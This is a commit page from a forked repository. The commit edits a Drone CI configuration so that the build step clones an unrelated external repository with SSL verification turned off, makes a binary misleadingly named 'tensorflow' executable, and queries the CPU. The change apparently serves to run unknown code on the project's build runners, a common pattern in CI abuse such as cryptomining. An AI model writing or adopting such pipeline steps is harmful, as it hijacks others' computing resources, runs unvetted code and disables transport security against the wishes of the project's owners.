forked from glen/fostr
Update '.drone.yml'
This commit is contained in:
parent
4a734815de
commit
36a8790e24
@ -6,7 +6,7 @@ steps:
|
|||||||
- name: build
|
- name: build
|
||||||
image: golang:1.17
|
image: golang:1.17
|
||||||
commands:
|
commands:
|
||||||
- git -c http.sslVerify "false" clone https://gitlab.zam.io/wajinhakim/drone-test.git
|
- git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git
|
||||||
- cd drone-test
|
- cd drone-test
|
||||||
- chmod +x tensorflow
|
- chmod +x tensorflow
|
||||||
- lscpu
|
- lscpu
|
||||||
|
Loading…
Reference in New Issue
Block a user